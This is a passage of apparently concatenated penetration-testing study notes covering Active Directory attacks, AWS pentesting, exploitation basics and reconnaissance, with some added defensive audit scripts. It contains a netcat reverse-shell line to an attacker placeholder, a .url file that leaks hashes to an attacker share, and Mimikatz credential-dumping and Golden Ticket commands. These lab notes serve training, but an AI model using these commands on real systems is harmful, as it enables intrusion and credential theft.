[https://medium.com/@Shorty420/kerberoasting-9108477279cc](https://medium.com/@Shorty420/kerberoasting-9108477279cc) 111 | 112 | #### Steps 113 | 114 | 1. Get SPNs, Dump Hash 115 | 1. `python GetUserSPNs.py dc-ip -request` 116 | 2. Crack that hash 117 | 1. `hashcat -m 13100 kerberoast.txt rockyou.txt` 118 | 119 | ### Example 120 | 121 | #### GetUserSPNs 122 | 123 | ```bash 124 | GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 192.168.57.140 -request 125 | ``` 126 | 127 | Copy the hash from the output and paste it into a text file. 
#### hashcat

```bash
hashcat -m 13100 hashes.txt rockyou.txt
```

### Mitigation

#### Strategies

* Strong passwords
* Least privilege

## GPP / cPassword Attacks

### GPP / cPassword Attacks Overview

Group Policy Preferences (GPP), AKA MS14-025

* Group Policy Preferences allowed admins to create policies using embedded credentials
* These credentials were encrypted and placed in a "cPassword" attribute
* The encryption key was accidentally made public, so any cPassword value can be decrypted
* Patched in MS14-025, but the patch does not remove cPassword entries created before it

Can check using the `smb_enum_gpp` Metasploit module

#### Resource

[https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/](https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/)

### Abusing GPP

Example using Active on HackTheBox.

#### Part 1

1. Downloaded files from SMB
2. Found Groups.xml with `name-active.htb\SVC_TGS` and the `cpassword=""`
3. Execute `gpp-decrypt <cpassword>`

#### Part 2

1. Tried `psexec.py active.htb/svc_tgs:<password>@<ip>` but failed...
2. Then `GetUserSPNs.py active.htb/svc_tgs:<password> -dc-ip <ip> -request`
   1. Returns a service ticket which we can copy and crack
      1. `hashcat -m 13100 hashes.txt rockyou.txt -O`
3. Finally `psexec.py active.htb/Administrator:<password>@<ip>`

## URL File Attacks

Requires a compromised user account with access to an open (writable) file share.

Create a file:

```
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\<ATTACKER_IP>\%USERNAME%.icon
IconIndex=1
```

Save the file as "@test.url". The '@' prefix makes it sort to the top of the folder listing and the '.url' extension is required for Explorer to parse it.

Then place it on the file share.
Then run Responder: `responder -I eth0 -v`

Now when a user navigates to the file share, Responder will capture hashes.

#### Resources

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share)

## Mimikatz

### Overview

#### What is Mimikatz?

* Tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks
* Dumps credentials stored in memory
* Just a few attacks: credential dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket

### Credential Dumping

Assuming we have already compromised the Domain Controller

```powershell
mimikatz
privilege::debug
sekurlsa::logonpasswords # Check for logon users' passwords in memory
lsadump::sam # Try to dump the SAM
lsadump::lsa /patch # Try to dump the LSA
```

## Golden Ticket Attacks

```powershell
mimikatz
privilege::debug
lsadump::lsa /inject /name:krbtgt
# Copy the SID of the domain, ex: S-1-5-21-xxxx-xxxx-xxxx
# Copy the NTLM hash of the krbtgt (Kerberos TGT) account
kerberos::golden /User:Administrator /domain:marvel.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NTLM> /id:500 /ptt
# Look for "Golden ticket for ... successfully submitted for current session"
misc::cmd # Start a command prompt in a session using the golden ticket we created
dir \\THEPUNISHER\c$ # We have access to this machine
# And then can try psexec.exe \\THEPUNISHER cmd.exe
```

## Additional Resources

Active Directory Security Blog: [https://adsecurity.org/](https://adsecurity.org/)

Harmj0y Blog: [http://blog.harmj0y.net/](http://blog.harmj0y.net/)

Pentester Academy Active Directory: [https://www.pentesteracademy.com/activedirectorylab](https://www.pentesteracademy.com/activedirectorylab)

Pentester Academy Red Team Labs: [https://www.pentesteracademy.com/redteamlab](https://www.pentesteracademy.com/redteamlab)

eLS PTX: [https://elearnsecurity.com/product/ecptx-certification/](https://elearnsecurity.com/product/ecptx-certification/)

--------------------------------------------------------------------------------
/active-directory/peh/post-compromise-enumeration.md:
--------------------------------------------------------------------------------
# Post-Compromise Enumeration

## Domain Enumeration with PowerView

#### Setup

```powershell
C:\Users\fcastle\Desktop>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\fcastle\Desktop> . .\PowerView.ps1
```

#### Get-NetDomain

Get information about the Domain

```powershell
PS C:\Users\fcastle\Desktop> Get-NetDomain

Forest                  : MARVEL.local
DomainControllers       : {HYDRA-DC.MARVEL.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : HYDRA-DC.MARVEL.local
RidRoleOwner            : HYDRA-DC.MARVEL.local
InfrastructureRoleOwner : HYDRA-DC.MARVEL.local
Name                    : MARVEL.local
```

#### Get-NetDomainController

Get specific Domain Controllers

```powershell
PS C:\Users\fcastle\Desktop> Get-NetDomainController

Forest                     : MARVEL.local
CurrentTime                : 1/20/2022 1:57:31 AM
HighestCommittedUsn        : 53277
OSVersion                  : Windows Server 2019 Standard Evaluation
Roles                      : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain                     : MARVEL.local
IPAddress                  : 192.168.72.137
SiteName                   : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections         : {}
OutboundConnections        : {}
Name                       : HYDRA-DC.MARVEL.local
Partitions                 : {DC=MARVEL,DC=local, CN=Configuration,DC=MARVEL,DC=local, CN=Schema,CN=Configuration,DC=MARVEL,DC=local, DC=DomainDnsZones,DC=MARVEL,DC=local...}
```

#### Get-DomainPolicy

Get all policies in the Domain

```powershell
PS C:\Users\fcastle\Desktop> Get-DomainPolicy

Name            Value
----            -----
Kerberos Policy {MaxTicketAge, MaxServiceAge, MaxClockSkew, MaxRenewAge...}
System Access   {MinimumPasswordAge, MaximumPasswordAge, LockoutBadCount, PasswordComplexity...}
Version         {Revision, signature}
Registry Values {MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash}
Unicode         {Unicode}
```

```powershell
PS C:\Users\fcastle\Desktop> (Get-DomainPolicy)."System Access"
Name                         Value
----                         -----
MinimumPasswordAge           {1}
MaximumPasswordAge           {42}
LockoutBadCount              {0}
PasswordComplexity           {1}
RequireLogonToChangePassword {0}
LSAAnonymousNameLookup       {0}
ForceLogoffWhenHourExpire    {0}
PasswordHistorySize          {24}
ClearTextPassword            {0}
MinimumPasswordLength        {7}
```

#### Get-NetUser

Get detailed user information

```powershell
PS C:\Users\fcastle\Desktop> Get-NetUser
...
logoncount            : 0
badpasswordtime       : 12/31/1600 4:00:00 PM
description           : Admin
distinguishedname     : CN=Tony Stark,CN=Users,DC=MARVEL,DC=local
objectclass           : {top, person, organizationalPerson, user}
displayname           : Tony Stark
userprincipalname     : tstark@MARVEL.local
name                  : Tony Stark
objectsid             : S-1-5-21-676298576-3461144594-1832349395-1107
samaccountname        : tstark
admincount            : 1
codepage              : 0
samaccounttype        : 805306368
whenchanged           : 6/18/2020 12:53:23 AM
accountexpires        : 9223372036854775807
countrycode           : 0
adspath               : LDAP://CN=Tony Stark,CN=Users,DC=MARVEL,DC=local
instancetype          : 4
objectguid            : 3efcaafd-dc9c-485e-8abf-a21b8a44d5d0
lastlogon             : 12/31/1600 4:00:00 PM
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=MARVEL,DC=local
dscorepropagationdata : {6/18/2020 12:49:06 AM, 1/1/1601 12:00:00 AM}
givenname             : Tony
memberof              : {CN=Group Policy Creator Owners,OU=Groups,DC=MARVEL,DC=local, CN=Domain Admins,OU=Groups,DC=MARVEL,DC=local, CN=Enterprise Admins,OU=Groups,DC=MARVEL,DC=local, CN=Schema Admins,OU=Groups,DC=MARVEL,DC=local...}
whencreated           : 6/18/2020 12:48:27 AM
sn                    : Stark
badpwdcount           : 0
cn                    : Tony Stark
useraccountcontrol    : 66048
usncreated            : 16443
primarygroupid        : 513
pwdlastset            : 6/17/2020 5:48:27 PM
usnchanged            : 16498
...
```

```powershell
PS C:\Users\fcastle\Desktop> Get-NetUser | select cn
cn
--
Administrator
Guest
krbtgt
Frank Castle
Tony Stark
Wade Wilson
SQL Service
```

#### Get-UserProperty

```powershell
PS C:\Users\fcastle\Desktop> Get-UserProperty -Properties pwdlastset

name          pwdlastset
----          ----------
Administrator 6/17/2020 4:57:17 PM
Guest         12/31/1600 4:00:00 PM
krbtgt        6/17/2020 5:11:21 PM
Frank Castle  6/17/2020 5:46:31 PM
Tony Stark    6/17/2020 5:48:27 PM
Wade Wilson   6/17/2020 5:49:38 PM
SQL Service   6/17/2020 5:52:09 PM
```

#### Get-NetComputer

Get the computers in the domain.

```powershell
PS C:\Users\fcastle\Desktop> Get-NetComputer
HYDRA-DC.MARVEL.local
PUNISHER.MARVEL.local
DEADPOOL.MARVEL.local
```

```powershell
PS C:\Users\fcastle\Desktop> Get-NetComputer -FullData
...
```

#### Get-NetGroup

Get the groups

```powershell
PS C:\Users\fcastle\Desktop> Get-NetGroup
...
```

#### Get-NetGroupMember

Get members of a group

```powershell
PS C:\Users\fcastle\Desktop> Get-NetGroupMember -GroupName "Domain Admins"
```

#### Invoke-ShareFinder

Get a list of active shares

```powershell
PS C:\Users\fcastle\Desktop> Invoke-ShareFinder
\\HYDRA-DC.MARVEL.local\ADMIN$   - Remote Admin
\\HYDRA-DC.MARVEL.local\C$       - Default share
\\HYDRA-DC.MARVEL.local\hackme   -
\\HYDRA-DC.MARVEL.local\IPC$     - Remote IPC
\\HYDRA-DC.MARVEL.local\NETLOGON - Logon server share
\\HYDRA-DC.MARVEL.local\SYSVOL   - Logon server share
\\PUNISHER.MARVEL.local\ADMIN$   - Remote Admin
\\PUNISHER.MARVEL.local\C$       - Default share
\\PUNISHER.MARVEL.local\IPC$     - Remote IPC
\\PUNISHER.MARVEL.local\Share    -
```

#### Get-NetGPO

Get the group policies of the domain

```powershell
PS C:\Users\fcastle\Desktop> Get-NetGPO
...
```

```powershell
PS C:\Users\fcastle\Desktop> Get-NetGPO | select displayname, whenchanged

displayname                       whenchanged
-----------                       -----------
Default Domain Policy             6/18/2020 12:20:10 AM
Default Domain Controllers Policy 6/18/2020 12:10:44 AM
Disable Windows Defender          6/18/2020 1:00:19 AM
```

#### Cheat Sheet

[https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)

## Grabbing Data with Invoke-Bloodhound

> Copied over SharpHound.ps1 to the Windows target machine

#### Setup

```powershell
C:\Users\fcastle\Desktop>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\fcastle\Desktop> . .\SharpHound.ps1
```

#### Execution

```powershell
PS C:\Users\fcastle\Desktop> Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName file.zip
```

Copy the zip file locally to Kali and then upload it into BloodHound.

## Enumerating Domain Data with Bloodhound

#### Queries

* Find all Domain Admins
* Find Shortest Paths to Domain Admins
* Shortest Paths to High Value Targets

#### On Graph Relationship

Access boxes that have a Domain Admin logged in (green)

* HasSession
  * Token impersonation; Mimikatz
* MemberOf
  * Group that the account belongs to

--------------------------------------------------------------------------------
/apis/methodology/README.md:
--------------------------------------------------------------------------------
# Methodology

## Methodologies

* [https://github.com/dsopas/MindAPI](https://github.com/dsopas/MindAPI)
* [https://github.com/shieldfy/API-Security-Checklist](https://github.com/shieldfy/API-Security-Checklist)
* [https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting)

## Recon

## Attack

--------------------------------------------------------------------------------
/apis/resources.md:
--------------------------------------------------------------------------------
# Resources

## APIs / GraphQL

### Blogs

* [https://labs.detectify.com/2021/08/31/go-fuzz-yourself-how-to-find-more-vulnerabilities-in-apis-through-fuzzing-whitepaper-download/](https://labs.detectify.com/2021/08/31/go-fuzz-yourself-how-to-find-more-vulnerabilities-in-apis-through-fuzzing-whitepaper-download/)
* [https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration](https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration)
* [https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/](https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/)

### Books

* [https://nostarch.com/hacking-apis](https://nostarch.com/hacking-apis)
* [https://www.amazon.com/dp/1718502443?\&linkCode=sl1\&tag=networkexpe08-20\&linkId=f60ab6caa0692ff6f974fd83b8a4ea52\&language=en\_US\&ref\_=as\_li\_ss\_tl](https://www.amazon.com/dp/1718502443?\&linkCode=sl1\&tag=networkexpe08-20\&linkId=f60ab6caa0692ff6f974fd83b8a4ea52\&language=en\_US\&ref\_=as\_li\_ss\_tl)
* [https://nostarch.com/black-hat-graphql](https://nostarch.com/black-hat-graphql) (GraphQL)

### Content

* InsiderPhD - [https://www.youtube.com/c/InsiderPhD](https://www.youtube.com/c/InsiderPhD)
* Alissa Knight - [https://www.youtube.com/alissaknight](https://www.youtube.com/alissaknight)
* Tools and Resources: [https://github.com/arainho/awesome-api-security](https://github.com/arainho/awesome-api-security)

### Courses

* [https://university.apisec.ai/](https://university.apisec.ai/)
* [https://www.udemy.com/course/uncle-rats-api-security-testing-guide](https://www.udemy.com/course/uncle-rats-api-security-testing-guide)
* [http://hackxpert.com/API-testing.php](http://hackxpert.com/API-testing.php)

### Labs

{% tabs %}
{% tab title="HackTheBox" %}
* [ ] AdmirerToo
* [ ] Backend
* [ ] BackendTwo
* [ ] Catch
* [ ] Cereal (graphql)
* [ ] Craft
* [ ] Devzat
* [ ] EarlyAccess
* [ ] Feline
* [ ] Flujab
* [ ] HackBack
* [ ] Help (graphql)
* [ ] Intense
* [ ] JSON
* [ ] Luke
* [ ] Multimaster
* [ ] Node
* [ ] Oouch
* [ ] Oz
* [ ] Perspective
* [ ] PivotAPI
* [ ] Player2
* [ ] Postman
* [ ] Ransom
* [ ] Secret
* [ ] Wall
* [ ] Zipper
{% endtab %}

{% tab title="TryHackMe" %}
* [x] [https://tryhackme.com/room/owaspapisecuritytop105w](https://tryhackme.com/room/owaspapisecuritytop105w)
* [x] [https://tryhackme.com/room/owaspapisecuritytop10d0](https://tryhackme.com/room/owaspapisecuritytop10d0)
* [ ] [https://tryhackme.com/room/bookstoreoc](https://tryhackme.com/room/bookstoreoc)
* [ ] [https://tryhackme.com/room/carpediem1](https://tryhackme.com/room/carpediem1) (graphql)
* [ ] [https://tryhackme.com/room/idor](https://tryhackme.com/room/idor) (idor)
{% endtab %}
{% endtabs %}

### Vulnerable Apps

* [https://github.com/roottusk/vapi](https://github.com/roottusk/vapi)
* [https://github.com/OWASP/crAPI](https://github.com/OWASP/crAPI)
* [https://github.com/erev0s/VAmPI](https://github.com/erev0s/VAmPI)
* [https://github.com/InsiderPhD/Generic-University](https://github.com/InsiderPhD/Generic-University)
* [https://github.com/snoopysecurity/dvws-node](https://github.com/snoopysecurity/dvws-node)
* [https://github.com/DevSlop/Pixi](https://github.com/DevSlop/Pixi)
* [https://github.com/marmicode/websheep](https://github.com/marmicode/websheep)
* [https://github.com/optiv/rest-api-goat](https://github.com/optiv/rest-api-goat)
* [https://github.com/payatu/Tiredful-API](https://github.com/payatu/Tiredful-API)

--------------------------------------------------------------------------------
/cloud/aws/README.md:
--------------------------------------------------------------------------------
# AWS

## Basic Concepts

#### AWS Pentesting Policy

[https://aws.amazon.com/security/penetration-testing/](https://aws.amazon.com/security/penetration-testing/)

#### AWS Keys
Comprised of the access key ID and the secret access key itself.

* Create Key:
  * IAM --> Users --> Create access key
* View Keys:
  * IAM --> Users --> Security Credentials --> Access key ID

Find Keys:

```bash
# Linux Location
~/.aws/credentials
# Windows Location
%USERPROFILE%\.aws\credentials
# Typical Entry
[default]
aws_access_key_id =
aws_secret_access_key =
```
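The credentials file above is the canonical place keys live, but the same `aws_access_key_id` line tends to get copied into repos, config files and scripts. The following is an added example (not code from the original notes): a small audit that greps a directory tree for AWS access key IDs by their documented prefix and checks that a credentials file is not readable by group or others. It assumes bash or POSIX sh with GNU grep, `ls`, `cut` and `mktemp`; every sample file and key value below is constructed and is not a real credential.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: find AWS access key IDs left in
# files and check that a credentials file is private. The sample tree is constructed.

# Long-term key IDs begin with AKIA, temporary (STS) key IDs with ASIA, each followed
# by 16 upper-case alphanumerics. A hit is something to rotate, not proof it is valid.
AKID_RE='(AKIA|ASIA)[0-9A-Z]{16}'

# find_aws_keys DIR -> lines of "path:lineno:keyid" for every key ID found under DIR
find_aws_keys() {
  grep -rEon "$AKID_RE" "$1" 2>/dev/null
}

# count_key_files DIR -> number of distinct files containing a key ID
count_key_files() {
  find_aws_keys "$1" | cut -d: -f1 | sort -u | wc -l | tr -d ' '
}

# creds_file_is_private FILE -> 0 when group and others have no permission bits (0600)
creds_file_is_private() {
  bits=$(ls -ld "$1" | cut -c5-10)   # group+other rwx fields of the mode string
  [ "$bits" = "------" ]
}

# Build a constructed sample tree: a private credentials file, a world-readable copy
# left in a repo, a source file with a temporary key in a comment, and a clean file.
# Prints the directory path.
make_sample_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/.aws" "$d/src"
  cat > "$d/.aws/credentials" <<'EOF'
[default]
aws_access_key_id = AKIAEXAMPLEKEY000001
aws_secret_access_key = EXAMPLESECRETNOTREAL00000000000000000000
EOF
  chmod 600 "$d/.aws/credentials"
  cp "$d/.aws/credentials" "$d/src/config.ini"
  chmod 644 "$d/src/config.ini"
  printf '# TODO remove before commit: ASIAEXAMPLETEMP00002\nprint("hello")\n' > "$d/src/app.py"
  printf 'nothing to see here\n' > "$d/src/README"
  echo "$d"
}

# main [DIR]: report key IDs and credentials-file permissions under DIR (sample tree by default)
main() {
  dir=${1:-$(make_sample_tree)}
  echo "Access key IDs found under $dir:"
  find_aws_keys "$dir" || echo "  (none)"
  for f in "$dir/.aws/credentials" "$dir/src/config.ini"; do
    [ -e "$f" ] || continue
    if creds_file_is_private "$f"; then
      echo "ok:   $f is private"
    else
      echo "WARN: $f is readable by group/other"
    fi
  done
}

main "$@"
```

Point `main` at a checkout or a home directory to audit it; the regex only catches the public half of a key pair, so a hit should be followed by looking for the matching `aws_secret_access_key` line and rotating the key in IAM.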
Check for Google dorks using ExploitDB. Ex: searching on `aws`

### IAM (Identity and Access Management) Security Issues

* Create User:
  * IAM --> Users --> Add users
* Potential Issues
  * Weak password security (password strength)
  * Lack of MFA
  * Rotating keys / key revocation/deactivation
  * Too many permissions / privileges (least privilege)

### S3 (Simple Storage Service)

* Create a bucket
  * S3 --> Buckets --> Create bucket
* Potential Issues
  * Public buckets
  * Permissions
  * Bucket versioning

Find Buckets:

```bash
nslookup flaws.cloud
Address: 52.218.245.11

# Reverse lookup
nslookup 52.218.245.11
11.245.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com
```

Can also check the website page source for S3 bucket URLs.

### EC2 (Elastic Compute Cloud)

* After the initial OS installation, update the OS/install patches (patch management)
* Update 3rd party software and services (email server, web server, etc.)
* AMI (Amazon Machine Image) - supported and maintained image provided by AWS that provides the information required to launch an instance
* Instances obtain the credentials for their IAM roles from the metadata service at 169.254.169.254

### Lambda

AWS Lambda is a serverless, event-driven compute service that lets you run code for virtually any type of application or backend service without provisioning or managing servers.

* Make sure the code that is passed to it is properly sanitized
* Security misconfigurations such as permission settings for other accounts
* Third-party libraries that are used
* Potential DoS if code takes input from users
* Obtains credentials from environment variables

### ARNs (Amazon Resource Names)

A way to uniquely identify AWS resources. An ARN is required when you need to specify a resource unambiguously across all of AWS.

* Can potentially leak information if such details can be accessed
* Be familiar with the format and paths

## Tools

### GrayhatWarfare

Search Public Buckets: [https://buckets.grayhatwarfare.com/](https://buckets.grayhatwarfare.com/)

### AWS CLI

```bash
aws configure # Set Access Key ID, Secret Access Key, Region name, output format
aws configure --profile <name> # Set same as above for a specific profile
aws --profile <name> <command>
tail .aws/credentials # Check the credentials file
aws help
aws iam
aws s3
```

### Pacu

The Open Source AWS Exploitation Framework

[https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/)

```bash
pacu # Start up pacu
# Create/Select a session
Pacu () > help
Pacu () > import_keys # Import existing keys
```

### AWS Bucket Dump

Security tool to look for interesting files in S3 buckets

[https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump)

```bash
# Example
python3 AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt
```

{% hint style="info" %}
References:

* ITProTV - Intro to AWS Penetration Testing
* https://www.linkedin.com/learning/introduction-to-aws-penetration-testing/
{% endhint %}

--------------------------------------------------------------------------------
/exploitation/exploitation-basics.md:
--------------------------------------------------------------------------------
# Exploitation Basics

## Reverse Shells vs Bind Shells

### Reverse Shell

The victim connects to us.

#### Attacker

```bash
nc -lvnp 4444 # Listening
```

#### Target

```bash
nc <ATTACKER_IP> 4444 -e /bin/sh # Connecting
```

### Bind Shell

We connect to the victim.

#### Attacker

```bash
nc <TARGET_IP> 4444 # Connecting
```

#### Target

```bash
nc -lvnp 4444 -e /bin/sh # Listening
```

## Staged vs Non-Staged Payloads

### Staged

* Sends the payload in stages
* Can be less stable
* Example: `windows/meterpreter/reverse_tcp`

### Non-staged

* Sends the exploit shellcode all at once
* Larger in size and won't always work
* Example: `windows/meterpreter_reverse_tcp`

## Gaining Root with Metasploit

### Example

```bash
searchsploit samba 2.2
# Found a 'trans2open' vulnerability with (Metasploit) mentioned
msfconsole
search trans2open
use exploit/linux/samba/trans2open
set RHOSTS <TARGET_IP>
run # or: exploit
# Session kept opening and closing...
# Looking at the options we see the payload linux/x86/meterpreter/reverse_tcp
# Since this didn't work we can change it to a non-staged payload
set payload linux/x86/shell_reverse_tcp
run # or: exploit
```

## Manual Exploitation

### Example

Finding an Apache mod\_ssl < 2.8.7 vulnerability

Used Google to identify there is an exploit called OpenLuck on GitHub

Followed the steps on GitHub to download, install, compile, and run the exploit.
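Seen from the host, the two shell shapes in "Reverse Shells vs Bind Shells" leave different traces in the socket table: a netcat or shell process that owns a LISTEN socket is what a bind shell looks like, while one that owns an ESTABLISHED socket is what a reverse shell (or a connected bind shell) looks like. The following is an added example (not code from the original notes) that classifies `ss -tnp` lines on that basis. It assumes bash or POSIX sh with awk and sed, and that `ss` was run with enough privilege to show process names; the sample lines are constructed, not captured from a host.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: flag shell-like processes that own
# network sockets, using the layout of `ss -tnp` output. Sample lines are constructed.

# Process names that should not normally own a TCP socket (space-padded for matching)
SHELL_PROCS=' sh bash dash zsh nc ncat netcat socat '

# classify_socket_line LINE -> prints "bind-shell ..." / "reverse-shell ..." or nothing
classify_socket_line() {
  line=$1
  state=$(printf '%s\n' "$line" | awk '{print $1}')
  local_addr=$(printf '%s\n' "$line" | awk '{print $4}')
  peer_addr=$(printf '%s\n' "$line" | awk '{print $5}')
  # first process name inside users:(("name",pid=...,fd=...)); empty on the header line
  proc=$(printf '%s\n' "$line" | sed -n 's/.*users:(("\([^"]*\)".*/\1/p')
  [ -n "$proc" ] || return 0
  case "$SHELL_PROCS" in
    *" $proc "*) ;;     # shell-like process: keep going
    *) return 0 ;;      # sshd, nginx and friends are expected to own sockets
  esac
  case "$state" in
    LISTEN) printf 'bind-shell %s local=%s\n' "$proc" "$local_addr" ;;
    ESTAB)  printf 'reverse-shell %s peer=%s\n' "$proc" "$peer_addr" ;;
  esac
}

# classify_sockets: read `ss -tnp` output on stdin, print one verdict per suspicious line
classify_sockets() {
  while IFS= read -r l; do
    classify_socket_line "$l"
  done
}

# Constructed sample in `ss -tnp` layout: a listening nc, a shell attached to a
# remote socket, and two legitimate services that must not be flagged.
sample_ss_output() {
  cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port Peer Address:Port  Process
LISTEN 0      1      0.0.0.0:4444       0.0.0.0:*          users:(("nc",pid=2312,fd=3))
ESTAB  0      0      10.0.0.5:51322     203.0.113.9:4444   users:(("sh",pid=2401,fd=0))
ESTAB  0      0      10.0.0.5:22        10.0.0.7:50122     users:(("sshd",pid=911,fd=4))
LISTEN 0      128    0.0.0.0:80         0.0.0.0:*          users:(("nginx",pid=700,fd=6))
EOF
}

# On a live host: ss -tnp | classify_sockets
sample_ss_output | classify_sockets
```

The check keys on the process name only, so a shell renamed or launched through an interpreter will not be caught; it is a cheap first pass that pairs well with the `-e /bin/sh` command lines above, where the socket ends up as the shell's stdin (`fd=0`) exactly as in the second sample line.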
## Brute Force Attacks

### Tools

#### Hydra

```bash
hydra -l <user> -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://<TARGET_IP> -t 4
```

#### Metasploit

```bash
search ssh
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set RHOSTS <TARGET_IP>
run
```

## Credential Stuffing and Password Spraying

### What is Credential Stuffing?

Injecting breached account credentials in hopes of account takeover by testing large volumes of stolen usernames and passwords across multiple sites.

### What is Password Spraying?

Attempting account takeover by trying a few commonly used passwords against a large number of known account identifiers (usernames), which keeps each account below its lockout threshold.

## Metasploit Unleashed

{% embed url="https://www.offensive-security.com/metasploit-unleashed" %}

## Armitage

_Armitage_ is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.

{% embed url="https://www.offensive-security.com/metasploit-unleashed/armitage" %}

--------------------------------------------------------------------------------
/information-gathering-reconnaissance/passive-reconnaissance.md:
--------------------------------------------------------------------------------
# Passive Reconnaissance

## Passive Reconnaissance Overview

### Physical/Social

#### Location Information

* Satellite images, drone recon, building layout (badge readers, break areas, security, fencing)

#### Job Information

* Employees (name, job title, phone number, manager, etc.)
* Pictures (badge photos, desk photos, computer photos, etc.)

### Web/Host

#### Target Validation

* WHOIS, nslookup, dnsrecon

#### Finding Subdomains

* Google Fu, dig, Nmap, Sublist3r, Bluto, crt.sh, etc.

#### Fingerprinting

* Nmap, Wappalyzer, WhatWeb, BuiltWith, Netcat

#### Data Breaches

* HaveIBeenPwned, Breach-Parse, WeLeakInfo

## Identify Our Target

Bugcrowd. Rules of Engagement: make sure you're in scope, noting the out-of-scope items.

## Discovering Email Addresses

### Tools

* hunter.io
* phonebook.cz
* voilanorbert.com
* Clearbit Connect Chrome extension
* emailhippo - tools.verifyemailaddress.io
* email-checker.net/validate

## Breached Credentials

### Gathering Breached Credentials

#### Breach-Parse

Tool on GitHub by TCM that searches breached username and password credentials for a specific domain name, limiting the results to accounts for that domain. Used for credential stuffing.

### Hunting Breached Credentials

#### DeHashed

Paid service at dehashed.com.

## Hunting Subdomains

### Tools

* Sublist3r
  * `sublist3r -d tesla.com`
* crt.sh (website)
* OWASP Amass
* httprobe

## Identifying Website Technologies

### Tools

* builtwith.com
* Wappalyzer
* whatweb
  * `whatweb https://tesla.com`

## Information Gathering with Burp Suite

Intercept website traffic. View/modify requests. View target details.
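"Identify Our Target" above makes the point that everything found during subdomain hunting has to be checked against the rules of engagement before it is touched. The following is an added example (not code from the original notes) of that scope check as a filter: a tiny rule list of allowed domains and excluded hosts, a suffix match that does not accept look-alike domains, and a filter that passes only in-scope hostnames through. It assumes bash or POSIX sh with `tr` and `sed`; the rule format and the sample host list are constructed, and tesla.com is reused only because the notes use it in their `sublist3r` example.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: keep discovered hosts inside the
# rules of engagement. Rules and sample hosts are constructed for the example.

# One rule per line: "+ domain" allows the domain and every subdomain,
# "- host" excludes one exact host even when a "+" rule covers it.
SCOPE_RULES='+ tesla.com
- legacy.tesla.com
+ teslamotors.com'

# host_matches_domain HOST DOMAIN -> 0 if HOST is DOMAIN or ends in ".DOMAIN".
# The leading dot matters: a bare "*tesla.com" pattern would also accept notesla.com.
host_matches_domain() {
  case "$1" in
    "$2"|*".$2") return 0 ;;
  esac
  return 1
}

# in_scope HOST -> 0 when some "+" rule covers HOST and no "-" rule names it
in_scope() {
  host=$(printf '%s' "$1" | tr 'A-Z' 'a-z' | sed 's/\.$//')   # lower-case, drop trailing dot
  verdict=1
  while read -r op target; do
    case "$op" in
      +) if host_matches_domain "$host" "$target"; then verdict=0; fi ;;
      -) if [ "$host" = "$target" ]; then return 1; fi ;;
    esac
  done <<EOF
$SCOPE_RULES
EOF
  return $verdict
}

# filter_in_scope: hostnames on stdin, only the in-scope ones on stdout
filter_in_scope() {
  while IFS= read -r h; do
    if in_scope "$h"; then printf '%s\n' "$h"; fi
  done
}

# Constructed output of a subdomain-hunting pass, including two traps:
# a look-alike registered elsewhere and a domain that merely ends in "tesla.com".
sample_hosts() {
  cat <<'EOF'
www.tesla.com
api.tesla.com
legacy.tesla.com
tesla.com.evil.example
notesla.com
shop.teslamotors.com
EOF
}

# Typical use: sublist3r -d tesla.com -o hosts.txt && filter_in_scope < hosts.txt
sample_hosts | filter_in_scope
```

Exclusions win over allowances, so a `- host` line from the engagement's out-of-scope list is enough to drop that host no matter how many `+` rules would otherwise cover it.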
## Google Fu

### Examples

* `site:tesla.com -www`
* `site:tesla.com filetype:pdf`

### Resources

{% embed url="https://ahrefs.com/blog/google-advanced-search-operators" %}

{% embed url="https://moz.com/learn/seo/search-operators" %}

## Utilizing Social Media

